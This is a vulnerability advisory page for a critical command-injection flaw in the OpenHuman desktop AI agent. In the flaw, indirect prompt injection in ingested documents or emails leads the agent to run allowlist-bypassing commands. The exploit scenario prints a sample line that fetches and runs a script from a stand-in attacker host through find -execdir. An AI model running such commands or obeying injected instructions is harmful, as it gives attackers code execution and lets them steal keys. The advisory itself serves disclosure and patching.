Skip to main content

OpenHuman desktop agent CVE-2026-55743

CRITICAL
OS Command Injection (CWE-78)
2026-06-17 TuranSec
9.6
CVSS 3.1 · Vendor: TuranSec
Share

Severity by source

Vendor (TuranSec) PRIMARY
9.6 CRITICAL
AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
vuln.today AI
9.6 CRITICAL

Network-delivered via ingested content (AV:N), low complexity once injected (AC:L), no host auth needed (PR:N), agent run against tainted input satisfies UI:R, sandbox-escape changes scope, full host CIA impact.

3.1 AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
4.0 AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Primary rating from Vendor (TuranSec).

CVSS VectorVendor: TuranSec

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
Required
Scope
Changed
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

2
Source Code Evidence Fetched
Jun 17, 2026 - 15:33 vuln.today
Analysis Generated
Jun 17, 2026 - 15:33 vuln.today

DescriptionCVE.org

The shell tool command allowlist in the SecurityPolicy of OpenHuman desktop agent through 0.54.0 (default Supervised security policy) can be bypassed to execute arbitrary OS commands with the privileges of the desktop user. Two flaws in src/openhuman/security/policy.rs combine: (1) is_args_safe() blocks the find flags -exec and -ok but not the functionally identical -execdir and -okdir, which also execute an arbitrary command for each matched file; and (2) skip_env_assignments() strips leading inline KEY=value environment-variable assignments before allowlist validation, so a command such as GIT_EXTERNAL_DIFF=<cmd> git diff is validated as the allowed git diff but, when executed via the shell, runs <cmd> through git's environment-driven hooks (for example GIT_EXTERNAL_DIFF or GIT_SSH_COMMAND). Because the sandbox is the primary trust boundary between untrusted LLM-processed content and the host operating system, an attacker can achieve remote code execution via indirect prompt injection: a malicious document, email, calendar event, or web page ingested by the agent instructs it to run a benign-looking allowlisted command, resulting in arbitrary command execution, data exfiltration, arbitrary file read/write, and lateral movement on the user's machine. The issue was fixed in commit 60050aa09a870f53ed7e4cd40ed41fd2860329e7 (first released in 0.54.22-staging; first stable release 0.56.0), which blocks -execdir/-okdir for find.

AnalysisAI

Remote code execution in OpenHuman desktop agent through 0.54.0 allows attackers to escape the Supervised SecurityPolicy sandbox and run arbitrary OS commands as the desktop user via indirect prompt injection. Two allowlist bypasses in src/openhuman/security/policy.rs - missing coverage of find's -execdir/-okdir flags and pre-validation stripping of inline KEY=value env assignments (e.g. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Craft prompt-injection payload in document/email
Delivery
Victim's OpenHuman agent ingests content
Exploit
Agent issues GIT_EXTERNAL_DIFF=<cmd> git diff or find -execdir
Execution
SecurityPolicy allowlist strips env prefix and passes
Persist
Shell executes attacker command as desktop user
Impact
Exfiltrate SSH keys/tokens and move laterally

Vulnerability AssessmentAI

Exploitation Requires the OpenHuman desktop agent (versions ≤0.54.0) to be running with the default Supervised SecurityPolicy and to ingest attacker-controlled content - a document, email, calendar event, or web page - that contains an indirect prompt-injection payload. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment All available signals point to high real-world risk. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker sends the victim a document, email, or calendar invite containing hidden instructions telling the OpenHuman agent to run a benign-sounding command such as 'git diff HEAD~1' for review purposes; the injected instruction prefixes it with GIT_EXTERNAL_DIFF=/tmp/x.sh (or uses find . -execdir curl attacker.tld/x.sh | sh \;) which passes the allowlist after env-stripping but executes the payload at shell time. …
Remediation Vendor-released patch: upgrade to OpenHuman 0.56.0 (first stable) or 0.54.22-staging, which incorporate commit 60050aa adding the DANGEROUS_ENV_PREFIXES denylist and blocking find's -execdir/-okdir flags; see https://github.com/tinyhumansai/openhuman/commit/60050aa09a870f53ed7e4cd40ed41fd2860329e7. … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours: Identify and inventory all systems running OpenHuman desktop agent 0.54.0. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-55743 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy